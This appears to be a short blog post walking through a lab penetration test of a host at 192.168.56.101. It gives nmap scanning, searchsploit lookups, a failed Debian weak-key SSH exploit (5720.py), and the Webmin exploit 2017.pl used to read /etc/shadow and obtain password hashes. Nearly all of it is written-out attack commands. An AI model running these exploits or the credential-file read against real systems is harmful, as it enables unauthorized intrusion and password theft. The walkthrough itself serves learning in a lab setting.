OK lets start.
- Infromation Gathering & Service Enumeration
The first, I scan network using nmap to get information like open ports, IP address, et
type the : command root@bt:~# nmap -sV 192.168.56.0/24
Vulnerability Asessment
open exploitdb tools using command : root@bt:~# cd /pentest/exploits/exploitdb
then search the ssh to find more possibility, type: root@bt:~# ./searchsploit ssh linux remote
Now check the SSH file to getting information and command for exploitation
type command : cat platforms/linux/remote/5720.py
after that, execution the file using command : python 5720.py /root/meeting4/rsa/2048 192.168.56.101 root 22 5
/root/meeting4/rsa/2048 is a directory where I extract debian_ssh_rsa_2048_x86.tar.bz2.0 file. so we must execution in the folder said.
turn out exploitation failed, so we must search other file to execution.
Then, I try the IP address (192.168.56.101) on browser, and I found the webmin page
Now, I try search the webmin on searchsploit.Move directory to exploitdb and then search webmin like bellow :
type command : ./searchsploit webmin
then see the perl file (2017.pl) to getting command for execution :
root@bt:/pentest/exploits/exploitdb# cat platforms/multiple/remote/2017.pl
OK, we have found the command to execution. Now start the execution and type the command as it appears in the file earlier : root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.56.101 10000 /etc/shadow 0
Success, we have found the account and password, but the password still encrypted :(
No comments:
Post a Comment